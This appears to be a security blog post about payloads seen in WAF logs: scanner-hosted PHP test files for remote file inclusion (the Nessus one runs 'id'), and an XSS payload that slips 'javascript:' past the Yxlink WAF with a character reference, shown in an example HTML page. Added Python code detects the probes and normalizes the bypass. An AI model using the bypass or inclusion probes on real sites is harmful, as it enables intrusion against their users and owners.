Neurohazard
Evening clouds and misty moon, white-haired and still poring over the classics; all things under heaven, thus have I heard.

Yxlink (铱迅信息) PHP command-execution web scanner: the remotely deployed payload

wpadmin, May 18, 2018, in InfoSec

Notes

Found in the WAF logs.

payload

# http://www.yxlink.com/nvs_test.txt
<?php
echo "vulnerability"." test";
?>

A similar case from Nessus

# http://rfi.nessus.org/rfi.txt
<?php
 # NessusFileIncludeTest
 echo base64_decode("TmVzc3VzQ29kZUV4ZWNUZXN0")."\n\n";
 echo "'id' output: ";
 system("id");
?>
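Both files are what a remote-file-inclusion probe asks the target to fetch: the scanner passes the URL in a parameter and checks whether the marker text comes back in the response. As an added example (not from the original post and not part of either scanner's own tooling), the Python routine below finds such probes in web server or WAF access logs: it pulls every query parameter out of each request line, URL-decodes it, and flags values that are absolute URLs, naming the scanner when the target is one of the two test files quoted above. It also decodes the markers the two test files print, so a response body containing "vulnerability test" or "NessusCodeExecTest" can be matched on the way out. The log lines are constructed (Apache combined format) and the parameter names `page` and `file` are assumptions.

```python
import base64
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Test files that vulnerability scanners host for RFI probes (both quoted above).
KNOWN_PROBE_FILES = {
    "www.yxlink.com/nvs_test.txt": "Yxlink NVS",
    "rfi.nessus.org/rfi.txt": "Nessus",
}

# Constructed sample log lines in Apache combined format; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [18/May/2018:10:01:12 +0800] "GET /index.php?page=http://www.yxlink.com/nvs_test.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [18/May/2018:10:01:13 +0800] "GET /index.php?page=http%3A%2F%2Frfi.nessus.org%2Frfi.txt%3F HTTP/1.1" 200 640 "-" "Mozilla/5.0"
198.51.100.7 - - [18/May/2018:10:02:00 +0800] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [18/May/2018:10:02:30 +0800] "GET /view.php?file=https://example.com/shell.txt HTTP/1.1" 404 0 "-" "curl/7.58"
"""

# client IP, timestamp, method and request target of a combined-format line
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def classify_value(value):
    """Return (kind, detail) for one parameter value, or None if it is not a remote URL."""
    decoded = unquote(value)  # a second decode catches values that were encoded twice
    parts = urlsplit(decoded)
    if parts.scheme not in ("http", "https", "ftp"):
        return None
    key = parts.netloc.lower() + parts.path
    if key in KNOWN_PROBE_FILES:
        return ("scanner-probe", KNOWN_PROBE_FILES[key])
    return ("remote-include", parts.netloc)


def scan_log(text):
    """Walk the log and report every query parameter that points at a remote file."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes names and values for us
        for name, value in parse_qsl(query, keep_blank_values=True):
            hit = classify_value(value)
            if hit:
                findings.append(
                    {"ip": m.group("ip"), "param": name, "kind": hit[0], "detail": hit[1]}
                )
    return findings


def probe_response_markers():
    """Strings a vulnerable host echoes back when it includes each test file,
    taken from the file bodies quoted above (the Nessus one is base64-encoded)."""
    return {
        "Yxlink NVS": "vulnerability" + " test",
        "Nessus": base64.b64decode("TmVzc3VzQ29kZUV4ZWNUZXN0").decode("ascii"),
    }


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} param={f['param']} {f['kind']}: {f['detail']}")
    print(probe_response_markers())
```

Matching only the two known hosts would miss a scanner that moves its test file, which is why anything that resolves to an absolute URL is reported as a generic remote include and the known hosts only add the attribution.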

XSS

Server: Yxlink WAF
<object/data=javascrip&#x74:confirm(1)>
<object/data=javascrip%26%23x74:confirm(1)>
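The bypass works because a filter that looks for the literal string `javascript:` in the raw attribute never sees it: the HTML parser decodes `&#x74` (no semicolon needed) to `t` only after the filter has run, and the second line is the same payload percent-encoded once more so that it survives being submitted through a query string and reflected into the page. The Python example below (added here, not part of the original post and not Yxlink's code) contrasts a naive substring check with one that normalizes the value the way the server and browser will, URL-decoding, then decoding character references, then dropping the control characters a URL parser discards, before reading the scheme. Whether a given browser still runs a `javascript:` URL from an object's data attribute is a separate question; the example only shows the decoding gap.

```python
import html
import re
from urllib.parse import unquote

# The two payloads from this post plus two controls; all constructed for the demo.
PAYLOADS = [
    "javascrip&#x74:confirm(1)",      # numeric character reference for 't'
    "javascrip%26%23x74:confirm(1)",  # the same, percent-encoded for a query string
    "javascript:confirm(1)",          # plain form the naive filter does catch
    "https://example.com/",           # benign URL
]


def naive_blocked(value):
    """What a signature-only filter does: look for the literal scheme in the raw bytes."""
    return "javascript:" in value.lower()


def normalize_attr_url(value, max_rounds=3):
    """Undo the layers between the wire and the browser's URL parser:
    percent-decoding (server side), then HTML character references (parser side),
    repeated until stable, then the whitespace handling of the URL parser
    (leading C0 controls/space stripped, tab/CR/LF removed anywhere)."""
    cur = value
    for _ in range(max_rounds):
        nxt = html.unescape(unquote(cur))
        if nxt == cur:
            break
        cur = nxt
    cur = re.sub(r"^[\x00-\x20]+", "", cur)
    cur = re.sub(r"[\t\r\n]", "", cur)
    return cur


def scheme_of(value):
    """Scheme the browser will act on, or None if the value is scheme-relative/relative."""
    m = re.match(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):", normalize_attr_url(value))
    return m.group(1).lower() if m else None


def is_javascript_url(value):
    """The check a filter should make: decode first, then inspect the scheme."""
    return scheme_of(value) == "javascript"


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r:40} naive={naive_blocked(p)!s:5} normalized={is_javascript_url(p)}")
```

The decode loop is bounded so that a value nested deeper than the server actually decodes is not over-normalized into a false positive; three rounds covers the single and double encoding seen here.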

Example HTML

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Page Title</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" type="text/css" media="screen" href="main.css" />
    <script src="main.js"></script>
</head>
<body>
    <object/data=javascrip&#x74:confirm(1)>
</body>
</html>
